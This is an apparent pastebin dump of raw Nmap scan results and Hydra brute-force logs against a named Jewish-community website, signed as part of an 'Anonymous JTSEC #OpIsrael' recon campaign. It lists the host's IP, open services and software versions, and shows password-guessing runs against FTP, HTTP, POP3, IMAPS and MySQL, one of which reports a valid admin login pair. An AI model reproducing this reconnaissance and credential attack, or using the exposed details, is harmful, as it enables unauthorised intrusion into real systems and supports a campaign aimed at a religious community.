- Discovered open port 80/tcp on 69.73.184.159
- Discovered open port 995/tcp on 69.73.184.159
- Discovered open port 3306/tcp on 69.73.184.159
- Discovered open port 143/tcp on 69.73.184.159
- Discovered open port 587/tcp on 69.73.184.159
- Discovered open port 993/tcp on 69.73.184.159
- Discovered open port 465/tcp on 69.73.184.159
- Discovered open port 5666/tcp on 69.73.184.159
- Completed SYN Stealth Scan at 20:14, 5.07s elapsed (474 total ports)
- Initiating Service scan at 20:14
- Scanning 11 services on www.jewish.net (69.73.184.159)
- Completed Service scan at 20:15, 34.05s elapsed (11 services on 1 host)
- Initiating OS detection (try #1) against www.jewish.net (69.73.184.159)
- Retrying OS detection (try #2) against www.jewish.net (69.73.184.159)
- Initiating Traceroute at 20:15
- Completed Traceroute at 20:15, 0.13s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 20:15
- Completed Parallel DNS resolution of 2 hosts. at 20:15, 16.50s elapsed
- NSE: Script scanning 69.73.184.159.
- Initiating NSE at 20:15
- Completed NSE at 20:19, 199.27s elapsed
- Initiating NSE at 20:19
- Completed NSE at 20:19, 0.44s elapsed
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.14s latency).
- Not shown: 428 filtered ports, 35 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ssl-cert: Subject: commonName=finn.nocdirect.com
- | Subject Alternative Name: DNS:finn.nocdirect.com, DNS:www.finn.nocdirect.com
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-10-24T00:00:00
- | Not valid after: 2019-10-24T23:59:59
- | MD5: 087b 6b54 a03e 5b2c 8b2c ca41 c757 1cd8
- |_SHA-1: 8b54 69e6 8e16 7e30 de40 1e11 032b b4f2 cde0 821c
- |_ssl-date: TLS randomness does not represent time
- 80/tcp open http-proxy Squid http proxy
- |_http-open-proxy: Proxy might be redirecting requests
- |_http-title: 403 Forbidden
- 110/tcp open pop3 Dovecot pop3d
- |_pop3-capabilities: USER AUTH-RESP-CODE UIDL RESP-CODES SASL(PLAIN LOGIN) STLS CAPA TOP PIPELINING
- |_ssl-date: TLS randomness does not represent time
- 143/tcp open imap Dovecot imapd
- |_imap-capabilities: AUTH=PLAIN more NAMESPACE STARTTLS Pre-login post-login AUTH=LOGINA0001 LOGIN-REFERRALS capabilities have ID IDLE SASL-IR LITERAL+ listed ENABLE IMAP4rev1 OK
- |_ssl-date: TLS randomness does not represent time
- 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
- |_http-server-header: Apache
- |_http-title: 403 Forbidden
- |_ssl-date: TLS randomness does not represent time
- 465/tcp open ssl/smtp Exim smtpd 4.91
- |_smtp-commands: finn.nocdirect.com Hello www.jewish.net [82.102.18.181], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, HELP,
- | ssl-cert: Subject: commonName=jewish.net
- | Subject Alternative Name: DNS:jewish.net, DNS:www.jewish.net
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2017-12-29T00:00:00
- | Not valid after: 2018-03-29T23:59:59
- | MD5: aae4 706f baf2 1d7a b7f5 7ad4 7c26 6041
- |_SHA-1: 91d9 5c27 3ced 329d 0274 e11e ec58 dc9a da56 0c21
- |_ssl-date: TLS randomness does not represent time
- 587/tcp open smtp Exim smtpd 4.91
- | smtp-commands: finn.nocdirect.com Hello www.jewish.net [82.102.18.181], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
- |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
- | ssl-cert: Subject: commonName=jewish.net
- | Subject Alternative Name: DNS:jewish.net, DNS:www.jewish.net
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2017-12-29T00:00:00
- | Not valid after: 2018-03-29T23:59:59
- | MD5: aae4 706f baf2 1d7a b7f5 7ad4 7c26 6041
- |_SHA-1: 91d9 5c27 3ced 329d 0274 e11e ec58 dc9a da56 0c21
- |_ssl-date: TLS randomness does not represent time
- 993/tcp open ssl/imaps?
- |_ssl-date: TLS randomness does not represent time
- 995/tcp open ssl/pop3s?
- |_ssl-date: TLS randomness does not represent time
- 3306/tcp open mysql MySQL 5.5.5-10.0.37-MariaDB
- | mysql-info:
- | Protocol: 10
- | Version: 5.5.5-10.0.37-MariaDB
- | Thread ID: 7153714
- | Capabilities flags: 63487
- | Some Capabilities: ConnectWithDatabase, IgnoreSigpipes, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, Support41Auth, FoundRows, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, LongPassword, ODBCClient, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
- | Status: Autocommit
- | Salt: XRri6mH]yj),@;H:*a+P
- |_ Auth Plugin Name: 94
- 5666/tcp open tcpwrapped
- Device type: general purpose
- Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (92%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
- Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (92%), Linux 3.10 - 4.11 (86%), Linux 3.10 - 3.12 (86%), Linux 4.4 (86%), Linux 4.9 (85%), Linux 3.2 - 4.9 (85%), Linux 2.6.18 (85%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 37.787 days (since Sat Oct 6 02:25:51 2018)
- Network Distance: 2 hops
- TCP Sequence Prediction: Difficulty=261 (Good luck!)
- IP ID Sequence Generation: All zeros
- Service Info: Host: finn.nocdirect.com
- TRACEROUTE (using port 139/tcp)
- HOP RTT ADDRESS
- 1 121.45 ms 10.244.200.1
- 2 121.29 ms 69.73.184.159
- NSE: Script Post-scanning.
- Initiating NSE at 20:19
- Completed NSE at 20:19, 0.00s elapsed
- Initiating NSE at 20:19
- Completed NSE at 20:19, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 278.73 seconds
- Raw packets sent: 974 (46.372KB) | Rcvd: 78 (3.944KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:19 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 20:19
- Completed NSE at 20:19, 0.00s elapsed
- Initiating NSE at 20:19
- Completed NSE at 20:19, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 20:19
- Completed Parallel DNS resolution of 1 host. at 20:19, 16.50s elapsed
- Initiating UDP Scan at 20:19
- Scanning www.jewish.net (69.73.184.159) [14 ports]
- Completed UDP Scan at 20:19, 2.17s elapsed (14 total ports)
- Initiating Service scan at 20:19
- Scanning 11 services on www.jewish.net (69.73.184.159)
- Service scan Timing: About 9.09% done; ETC: 20:37 (0:16:20 remaining)
- Completed Service scan at 20:21, 102.58s elapsed (11 services on 1 host)
- Initiating OS detection (try #1) against www.jewish.net (69.73.184.159)
- Retrying OS detection (try #2) against www.jewish.net (69.73.184.159)
- Initiating Traceroute at 20:21
- Completed Traceroute at 20:21, 7.20s elapsed
- Initiating Parallel DNS resolution of 1 host. at 20:21
- Completed Parallel DNS resolution of 1 host. at 20:21, 16.50s elapsed
- NSE: Script scanning 69.73.184.159.
- Initiating NSE at 20:21
- Completed NSE at 20:21, 20.31s elapsed
- Initiating NSE at 20:21
- Completed NSE at 20:22, 1.02s elapsed
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.19s latency).
- PORT STATE SERVICE VERSION
- 53/udp closed domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Too many fingerprints match this host to give specific OS details
- Network Distance: 11 hops
- TRACEROUTE (using port 137/udp)
- HOP RTT ADDRESS
- 1 ...
- 2 122.28 ms 10.244.200.1
- 3 ... 4
- 5 121.75 ms 10.244.200.1
- 6 126.76 ms 10.244.200.1
- 7 126.75 ms 10.244.200.1
- 8 126.72 ms 10.244.200.1
- 9 120.09 ms 10.244.200.1
- 10 120.00 ms 10.244.200.1
- 11 120.12 ms 10.244.200.1
- 12 ... 18
- 19 121.81 ms 10.244.200.1
- 20 121.32 ms 10.244.200.1
- 21 120.30 ms 10.244.200.1
- 22 ... 29
- 30 120.58 ms 10.244.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 20:22
- Completed NSE at 20:22, 0.00s elapsed
- Initiating NSE at 20:22
- Completed NSE at 20:22, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 171.78 seconds
- Raw packets sent: 123 (9.368KB) | Rcvd: 30 (3.796KB)
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:22 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.16s latency).
- Not shown: 17 filtered ports, 4 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 80/tcp open http
- 110/tcp open pop3
- 993/tcp open imaps
- 3306/tcp open mysql
- #######################################################################################################################################
- + -- --=[Port 21 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-12 20:22:19
- [DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
- [DATA] attacking ftp://www.jewish.net:21/
- [STATUS] 1.81 tries/min, 197 tries in 01:49h, 31 to do in 00:18h, 1 active
- [STATUS] 1.84 tries/min, 202 tries in 01:50h, 26 to do in 00:15h, 1 active
- [STATUS] 1.86 tries/min, 207 tries in 01:51h, 21 to do in 00:12h, 1 active
- [STATUS] 1.89 tries/min, 212 tries in 01:52h, 16 to do in 00:09h, 1 active
- [STATUS] 1.91 tries/min, 216 tries in 01:53h, 12 to do in 00:07h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-12 22:15:19
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-12 22:15:19
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://www.jewish.net:80//
- [80][http-get] host: www.jewish.net login: admin password: admin
- [STATUS] attack finished for www.jewish.net (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-12 22:15:21
- + -- --=[Port 110 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-12 22:15:21
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking pop3://www.jewish.net:110/
- [STATUS] 6.00 tries/min, 6 tries in 00:01h, 1524 to do in 04:15h, 1 active
- ctive
- [STATUS] 3.62 tries/min, 1495 tries in 06:53h, 35 to do in 00:10h, 1 active
- [STATUS] 3.62 tries/min, 1498 tries in 06:54h, 32 to do in 00:09h, 1 active
- [STATUS] 3.62 tries/min, 1503 tries in 06:55h, 27 to do in 00:08h, 1 active
- [STATUS] 3.62 tries/min, 1506 tries in 06:56h, 24 to do in 00:07h, 1 active
- [STATUS] 3.62 tries/min, 1509 tries in 06:57h, 21 to do in 00:06h, 1 active
- [STATUS] 3.62 tries/min, 1513 tries in 06:58h, 17 to do in 00:05h, 1 active
- [STATUS] 3.62 tries/min, 1517 tries in 06:59h, 13 to do in 00:04h, 1 active
- [STATUS] 3.62 tries/min, 1520 tries in 07:00h, 10 to do in 00:03h, 1 active
- [STATUS] 3.62 tries/min, 1524 tries in 07:01h, 6 to do in 00:02h, 1 active
- [STATUS] 3.62 tries/min, 1528 tries in 07:02h, 2 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-13 05:18:11
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 closed... skipping.
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-13 05:18:11
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking imaps://www.jewish.net:993/993
- [STATUS] 4.00 tries/min, 4 tries in 00:01h, 1526 to do in 06:22h, 1 active
- [STATUS] 3.26 tries/min, 1497 tries in 07:39h, 33 to do in 00:11h, 1 active
- [STATUS] 3.26 tries/min, 1500 tries in 07:40h, 30 to do in 00:10h, 1 active
- [STATUS] 3.26 tries/min, 1503 tries in 07:41h, 27 to do in 00:09h, 1 active
- [STATUS] 3.26 tries/min, 1506 tries in 07:42h, 24 to do in 00:08h, 1 active
- [STATUS] 3.26 tries/min, 1509 tries in 07:43h, 21 to do in 00:07h, 1 active
- [STATUS] 3.26 tries/min, 1513 tries in 07:44h, 17 to do in 00:06h, 1 active
- [STATUS] 3.26 tries/min, 1516 tries in 07:45h, 14 to do in 00:05h, 1 active
- [STATUS] 3.26 tries/min, 1519 tries in 07:46h, 11 to do in 00:04h, 1 active
- [STATUS] 3.26 tries/min, 1522 tries in 07:47h, 8 to do in 00:03h, 1 active
- [STATUS] 3.26 tries/min, 1525 tries in 07:48h, 5 to do in 00:02h, 1 active
- [STATUS] 3.26 tries/min, 1529 tries in 07:49h, 1 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-13 13:07:43
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-13 13:07:43
- [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
- [DATA] attacking mysql://www.jewish.net:3306/
- [STATUS] 47.00 tries/min, 47 tries in 00:01h, 31 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-13 13:08:47
- #######################################################################################################################################
- Anonymous JTSEC #OpIsrael Full Recon #11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement